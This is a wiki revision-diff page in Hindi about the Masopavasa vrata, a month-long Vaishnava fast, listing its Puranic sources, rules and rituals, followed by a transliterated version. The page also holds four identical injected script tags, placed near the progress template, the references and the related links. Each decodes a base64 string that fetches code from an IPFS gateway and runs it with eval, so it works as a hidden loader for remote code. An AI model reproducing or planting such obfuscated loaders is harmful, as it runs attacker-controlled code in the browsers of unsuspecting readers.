Difference between revisions of "मासोपनास व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (मासोपनासव्रत का नाम बदलकर मासोपनास व्रत कर दिया गया है)
Line 2: Line 2:
 
*'सभी व्रतों में यह सर्वोत्तम व्रत है।  
 
*'सभी व्रतों में यह सर्वोत्तम व्रत है।  
 
*यह एक अति प्राचीन व्रत है।  
 
*यह एक अति प्राचीन व्रत है।  
*ई0 पू0 दूसरी शती में रानी नायनिका (नागनिका) ने इसे सम्पादित किया था<ref> (ए0 एस0 डब्ल्यू0 आई0, जिल्द 5, पृ0 60)</ref>।  
+
*ई0 पू0 दूसरी शती में रानी नायनिका (नागनिका) ने इसे सम्पादित किया था<ref>(ए0 एस0 डब्ल्यू0 आई0, जिल्द 5, पृ0 60)</ref>।  
*इसका वर्णन [[अग्नि पुराण]] <ref>अग्नि पुराण (204|1-18)</ref>; [[गरुड़ पुराण]]<ref>गरुड़ पुराण (1|122|1-7)</ref>, [[पद्म पुराण]] <ref>पद्म पुराण (6|121|15-54)</ref> में किया गया है। *अग्नि पुराण अति संक्षिप्त है, उसी को अति संक्षिप्त रूप में यहाँ पर दिया जा रहा है।  
+
*इसका वर्णन [[अग्नि पुराण]]<ref>अग्नि पुराण (204|1-18)</ref>; [[गरुड़ पुराण]]<ref>गरुड़ पुराण (1|122|1-7)</ref>, [[पद्म पुराण]]<ref>पद्म पुराण (6|121|15-54)</ref> में किया गया है।  
 +
*अग्नि पुराण अति संक्षिप्त है, उसी को अति संक्षिप्त रूप में यहाँ पर दिया जा रहा है।  
 
*कर्ता को सभी [[वैष्णव]] व्रत (यथा–द्वादशी) कर लेने चाहिए, गुरु का आदेश ले लेना चाहिए; अपनी शक्ति को देखकर [[आश्विन मास|आश्विन]] [[शुक्ल पक्ष|शुक्ल]] एकादशी से आरम्भ कर उसे 30 दिनों तक ले जाने का संकल्प करना चाहिए।  
 
*कर्ता को सभी [[वैष्णव]] व्रत (यथा–द्वादशी) कर लेने चाहिए, गुरु का आदेश ले लेना चाहिए; अपनी शक्ति को देखकर [[आश्विन मास|आश्विन]] [[शुक्ल पक्ष|शुक्ल]] एकादशी से आरम्भ कर उसे 30 दिनों तक ले जाने का संकल्प करना चाहिए।  
 
*किसी वानप्रस्थ व्यक्ति या यति या विधवा द्वारा यह सम्पादित होना चाहिए।  
 
*किसी वानप्रस्थ व्यक्ति या यति या विधवा द्वारा यह सम्पादित होना चाहिए।  
 
*पुष्पों आदि से प्रतिदिन तीन बार [[विष्णु]] पूजा होनी चाहिए।  
 
*पुष्पों आदि से प्रतिदिन तीन बार [[विष्णु]] पूजा होनी चाहिए।  
 
*विष्णु भगवान की प्रशस्ति के गान गाये जाने चाहिए।  
 
*विष्णु भगवान की प्रशस्ति के गान गाये जाने चाहिए।  
*विष्णु का ध्यान करना चाहिए; व्यर्थ की बातों का त्याग होना चाहिए; धन की इच्छा का त्याग करना चाहिए।  
+
*विष्णु का ध्यान करना चाहिए।
 +
*व्यर्थ की बातों का त्याग होना चाहिए।
 +
*धन की इच्छा का त्याग करना चाहिए।  
 
*जो नियमों का पालन नहीं करते उन्हें नहीं छूना चाहिए, मन्दिर में 30 दिनों तक रहना चाहिए।  
 
*जो नियमों का पालन नहीं करते उन्हें नहीं छूना चाहिए, मन्दिर में 30 दिनों तक रहना चाहिए।  
 
*30 दिनों के उपरान्त 12वें दिन ब्रह्मभोज देना चाहिए, दक्षिणा देनी चाहिए तथा 13 ब्राह्मणों को आमंत्रित कर [[पारण]] करना चाहिए।  
 
*30 दिनों के उपरान्त 12वें दिन ब्रह्मभोज देना चाहिए, दक्षिणा देनी चाहिए तथा 13 ब्राह्मणों को आमंत्रित कर [[पारण]] करना चाहिए।  
Line 16: Line 19:
 
*ऐसी मान्यता है कि वह स्थान जहाँ पर कर्ता ठहरता है पवित्र हो जाता है, वह अपने एवं अपने परिवार के लोगों को स्वर्गलोक ले जाता है।  
 
*ऐसी मान्यता है कि वह स्थान जहाँ पर कर्ता ठहरता है पवित्र हो जाता है, वह अपने एवं अपने परिवार के लोगों को स्वर्गलोक ले जाता है।  
 
*यदि कर्ता बीच में मूर्छित हो जाय तो उसे दूध, घी, एवं फल का रस देना चाहिए।  
 
*यदि कर्ता बीच में मूर्छित हो जाय तो उसे दूध, घी, एवं फल का रस देना चाहिए।  
*ब्राह्मणों की सम्मति से ऐसा करने से व्रत खण्डित नहीं होता है <ref>हेमाद्रि (व्रत0 2, 776-783, विष्णुरहस्य से उद्धरण)</ref>
+
*ब्राह्मणों की सम्मति से ऐसा करने से व्रत खण्डित नहीं होता है।<ref>हेमाद्रि (व्रत0 2, 776-783, विष्णुरहस्य से उद्धरण)</ref>
 
 
 
 
 
 
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 06:20, 11 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • 'sabhi vratoan mean yah sarvottam vrat hai.
  • yah ek ati prachin vrat hai.
  • ee0 poo0 doosari shati mean rani nayanika (naganika) ne ise sampadit kiya tha[1].
  • isaka varnan agni puran[2]; garu d puran[3], padm puran[4] mean kiya gaya hai.
  • agni puran ati sankshipt hai, usi ko ati sankshipt roop mean yahaan par diya ja raha hai.
  • karta ko sabhi vaishnav vrat (yatha–dvadashi) kar lene chahie, guru ka adesh le lena chahie; apani shakti ko dekhakar ashvin shukl ekadashi se arambh kar use 30 dinoan tak le jane ka sankalp karana chahie.
  • kisi vanaprasth vyakti ya yati ya vidhava dvara yah sampadit hona chahie.
  • pushpoan adi se pratidin tin bar vishnu pooja honi chahie.
  • vishnu bhagavan ki prashasti ke gan gaye jane chahie.
  • vishnu ka dhyan karana chahie.
  • vyarth ki batoan ka tyag hona chahie.
  • dhan ki ichchha ka tyag karana chahie.
  • jo niyamoan ka palan nahian karate unhean nahian chhoona chahie, mandir mean 30 dinoan tak rahana chahie.
  • 30 dinoan ke uparant 12vean din brahmabhoj dena chahie, dakshina deni chahie tatha 13 brahmanoan ko amantrit kar paran karana chahie.
  • vastroan ka jo da, asan, patr, chhatr, kh daooan, dan roop mean diye jane chahie.
  • ek palang par vishnu ki svarn-pratima ka poojan hona chahie.
  • apani svayan ki pratima ko vastr adi dena chahie, palang guru ko de deni chahie.
  • aisi manyata hai ki vah sthan jahaan par karta thaharata hai pavitr ho jata hai, vah apane evan apane parivar ke logoan ko svargalok le jata hai.
  • yadi karta bich mean moorchhit ho jay to use doodh, ghi, evan phal ka ras dena chahie.
  • brahmanoan ki sammati se aisa karane se vrat khandit nahian hota hai.[5]

 


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. (e0 es0 dablyoo0 aee0, jild 5, pri0 60)
  2. agni puran (204|1-18)
  3. garu d puran (1|122|1-7)
  4. padm puran (6|121|15-54)
  5. hemadri (vrat0 2, 776-783, vishnurahasy se uddharan)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>